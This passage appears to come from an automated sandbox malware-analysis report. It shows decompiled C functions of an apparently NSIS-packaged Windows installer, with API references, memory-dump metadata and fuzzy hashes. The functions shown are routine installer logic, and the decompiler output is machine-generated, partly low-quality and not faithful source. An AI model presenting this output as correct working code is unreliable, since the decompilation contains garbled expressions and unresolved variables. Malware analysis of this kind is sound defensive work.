                                                                                                                          • Instruction Fuzzy Hash: E7111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AF69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                          0x00401ccb
                                                                                                                          0x00401cd2
                                                                                                                          0x00401d01
                                                                                                                          0x00401d09
                                                                                                                          0x00401d10
                                                                                                                          0x00401d10
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                          • GetClientRect.USER32 ref: 00401CD2
                                                                                                                          • LoadImageA.USER32 ref: 00401CF3
                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                          • Instruction ID: c9eade559dcb8dabe12f7fb8fefc2ecb3bb817c4e851fb83d30c8e131ed4808d
                                                                                                                          • Opcode Fuzzy Hash: aab1ff915591a61a6dff0f8bf18086dee3b735981cb00012526b248d1bc18b45
                                                                                                                          • Instruction Fuzzy Hash: B5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404568, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00404568(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FF(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FF(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FF(_t34, 0, 0x420478, 0x420478, _a8);
				wsprintfA(_t26 + lstrlenA(0x420478), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423658, _a4, 0x420478);
			}













                                                                                                                          0x00404570
                                                                                                                          0x00404574
                                                                                                                          0x0040457c
                                                                                                                          0x0040457f
                                                                                                                          0x00404580
                                                                                                                          0x00404582
                                                                                                                          0x00404584
                                                                                                                          0x00404587
                                                                                                                          0x00404587
                                                                                                                          0x0040458e
                                                                                                                          0x00404594
                                                                                                                          0x00404594
                                                                                                                          0x0040459b
                                                                                                                          0x004045a6
                                                                                                                          0x004045a7
                                                                                                                          0x004045aa
                                                                                                                          0x004045aa
                                                                                                                          0x004045b7
                                                                                                                          0x004045c2
                                                                                                                          0x004045c5
                                                                                                                          0x004045d7
                                                                                                                          0x004045de
                                                                                                                          0x004045df
                                                                                                                          0x004045ee
                                                                                                                          0x004045fe
                                                                                                                          0x0040461a

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                                                          • wsprintfA.USER32 ref: 004045FE
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404611
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                          • Opcode ID: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                                                          • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                                                          • Opcode Fuzzy Hash: 1fe6c35c0a5c12af0758eda6fcd91f800dae708434e3b464b1985a7a483ce98e
                                                                                                                          • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E0040593B();
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                          0x00401bb6
                                                                                                                          0x00401bc2
                                                                                                                          0x00401bc5
                                                                                                                          0x00401bce
                                                                                                                          0x00401bce
                                                                                                                          0x00401bd1
                                                                                                                          0x00401bd5
                                                                                                                          0x00401bde
                                                                                                                          0x00401bde
                                                                                                                          0x00401be1
                                                                                                                          0x00401be5
                                                                                                                          0x00401be7
                                                                                                                          0x00401c34
                                                                                                                          0x00401c36
                                                                                                                          0x00401c3f
                                                                                                                          0x00401c47
                                                                                                                          0x00401c4a
                                                                                                                          0x00401c4a
                                                                                                                          0x00401c53
                                                                                                                          0x00000000
                                                                                                                          0x00401be9
                                                                                                                          0x00401bf0
                                                                                                                          0x00401bf2
                                                                                                                          0x00401bfa
                                                                                                                          0x00401bfd
                                                                                                                          0x00401c25
                                                                                                                          0x00401c59
                                                                                                                          0x00401c59
                                                                                                                          0x00401bff
                                                                                                                          0x00401c0d
                                                                                                                          0x00401c15
                                                                                                                          0x00401c18
                                                                                                                          0x00401c18
                                                                                                                          0x00401bfd
                                                                                                                          0x00401c5c
                                                                                                                          0x00401c5f
                                                                                                                          0x00401c65
                                                                                                                          0x00402833
                                                                                                                          0x00402833
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                          • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                                                          • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                          • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040523D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040523D(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422480->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422480,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                          0x00405246
                                                                                                                          0x00405262
                                                                                                                          0x0040526a
                                                                                                                          0x0040526f
                                                                                                                          0x00000000
                                                                                                                          0x00405275
                                                                                                                          0x00405279

                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                                                          • Error launching installer, xrefs: 00405250
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                          • API String ID: 3712363035-4043152584
                                                                                                                          • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                          • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                                                          • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                          • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004054D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004054D0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                          0x004054d1
                                                                                                                          0x004054e8
                                                                                                                          0x004054f0
                                                                                                                          0x004054f0
                                                                                                                          0x004054f8

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054D6
                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004054DF
                                                                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 004054F0
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004054D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-3936084776
                                                                                                                          • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction ID: 18d73bba3a4f2c077241afd2b81ba446c35da1b9bd2d8ef2eba9fb39a34af30a
                                                                                                                          • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction Fuzzy Hash: 09D0A7B2505970AED20126195C05FCF2A08CF023117044423F640B21D2C63C5C819BFD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E0040593B(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E0040593B(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                                          0x00401ec7
                                                                                                                          0x00401ecf
                                                                                                                          0x00401ed4
                                                                                                                          0x00401ed9
                                                                                                                          0x00401edd
                                                                                                                          0x00401ee0
                                                                                                                          0x00401ee2
                                                                                                                          0x00401ee9
                                                                                                                          0x00401ef2
                                                                                                                          0x00401efa
                                                                                                                          0x00401efd
                                                                                                                          0x00401f12
                                                                                                                          0x00401f18
                                                                                                                          0x00401f2b
                                                                                                                          0x00401f34
                                                                                                                          0x00401f40
                                                                                                                          0x00401f45
                                                                                                                          0x00401f45
                                                                                                                          0x00401f2b
                                                                                                                          0x00401f48
                                                                                                                          0x00401b75
                                                                                                                          0x00401b75
                                                                                                                          0x00401efd
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                            • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1404258612-0
                                                                                                                          • Opcode ID: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                          • Instruction ID: 4f4abe4324f754641e01f0e672b51484e064b7e428c6eed24e296c4d37409401
                                                                                                                          • Opcode Fuzzy Hash: f9744f7992f8663f166aa538b3da0bee02a0a5d08582e8cd95fa90b08a46e0f1
                                                                                                                          • Instruction Fuzzy Hash: 5F114CB2901109BFDB01EFA5D981DAEBBB9EF04354B20803AF501F61E1D7389A55DB28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af54->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af64 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af6b = 1;
				 *0x40af68 = _t11 & 0x00000001;
				 *0x40af69 = _t11 & 0x00000002;
				 *0x40af6a = _t11 & 0x00000004;
				E004059FF(_t18, _t24, _t26, 0x40af70,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af54);
				_push(_t14);
				_push(_t26);
				E0040593B();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                          0x00401d29
                                                                                                                          0x00401d42
                                                                                                                          0x00401d4c
                                                                                                                          0x00401d51
                                                                                                                          0x00401d5c
                                                                                                                          0x00401d63
                                                                                                                          0x00401d75
                                                                                                                          0x00401d7b
                                                                                                                          0x00401d80
                                                                                                                          0x00401d8a
                                                                                                                          0x004024b8
                                                                                                                          0x00401561
                                                                                                                          0x00402833
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D22
                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                          • CreateFontIndirectA.GDI32(0040AF54), ref: 00401D8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3272661963-0
                                                                                                                          • Opcode ID: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                                                          • Instruction ID: 822a585a95499be2ccb46a886614a983d19f7779af01092212c1c8a44adbdb5d
                                                                                                                          • Opcode Fuzzy Hash: 78f79da71c4801185515a33ee10eecec6988933ac577fdebba6a0d8b1e27de8a
                                                                                                                          • Instruction Fuzzy Hash: 80F04FF1A49742AEE70167B0AE0AB9A3B659719306F14043AF242BA1E2C5BC0454DB7F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402BBE, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x417020; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423e8c;
						if(_t2 >  *0x423e8c) {
							_t3 = CreateDialogParamA( *0x423e80, 0x6f, 0, E00402B3B, 0);
							 *0x417020 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D38(0);
					}
				} else {
					_t6 =  *0x417020; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x417020 = 0;
					return _t6;
				}
			}






                                                                                                                          0x00402bc5
                                                                                                                          0x00402bdf
                                                                                                                          0x00402be5
                                                                                                                          0x00402bef
                                                                                                                          0x00402bf5
                                                                                                                          0x00402bfb
                                                                                                                          0x00402c0c
                                                                                                                          0x00402c15
                                                                                                                          0x00000000
                                                                                                                          0x00402c1a
                                                                                                                          0x00402c21
                                                                                                                          0x00402be7
                                                                                                                          0x00402bee
                                                                                                                          0x00402bee
                                                                                                                          0x00402bc7
                                                                                                                          0x00402bc7
                                                                                                                          0x00402bce
                                                                                                                          0x00402bd1
                                                                                                                          0x00402bd1
                                                                                                                          0x00402bd7
                                                                                                                          0x00402bde
                                                                                                                          0x00402bde

                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402BEF
                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                          • Instruction ID: f2d052a30a3472248e345e5832336eca953f0b1533712f6c56216133e551431f
                                                                                                                          • Opcode Fuzzy Hash: bf07767b331bb76d3b5a2f8e5622a218379b171e4cdb58aec93dcc8b8375aee9
                                                                                                                          • Instruction Fuzzy Hash: 2AF0DA31D09320ABC661AF14FD4CADB7B75BB09B127014936F101B52E8D77868818BAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404CCB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404CCB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420460 != _t22) {
							 *0x420460 = _t22;
							E004059DD(0x420478, 0x424000);
							E0040593B(0x424000, _t22);
							E0040140B(6);
							E004059DD(0x424000, 0x420478);
						}
						L11:
						return CallWindowProcA( *0x420468, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040464A(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DDB(0x413);
				return 0;
			}




                                                                                                                          0x00404cd7
                                                                                                                          0x00404cfc
                                                                                                                          0x00404d1c
                                                                                                                          0x00404d1f
                                                                                                                          0x00404d22
                                                                                                                          0x00404d39
                                                                                                                          0x00404d3f
                                                                                                                          0x00404d46
                                                                                                                          0x00404d4d
                                                                                                                          0x00404d54
                                                                                                                          0x00404d59
                                                                                                                          0x00404d5f
